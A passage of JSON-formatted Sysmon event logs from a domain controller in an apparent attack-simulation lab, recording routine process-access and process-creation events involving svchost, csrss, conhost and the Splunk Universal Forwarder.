05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02F8-5F25-0000-00107E330600}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02F8-5F25-0000-00107E330600}","TargetProcessId":"3384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4229,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.122\r\nSourceProcessGUID: {A837DB8D-02F8-5F25-0000-00107E330600}\r\nSourceProcessId: 3384\r\nSourceThreadId: 3468\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.122","SourceProcessGUID":"{A837DB8D-02F8-5F25-0000-00107E330600}","SourceProcessId":"3384","SourceThreadId":"3468","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nProcessGuid: {A837DB8D-02F9-5F25-0000-001036350600}\r\nProcessId: 4256\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","ProcessGuid":"{A837DB8D-02F9-5F25-0000-001036350600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02F9-5F25-0000-001036350600}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02F9-5F25-0000-001036350600}","TargetProcessId":"4256","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02F9-5F25-0000-001036350600}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02F9-5F25-0000-001036350600}","TargetProcessId":"4256","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 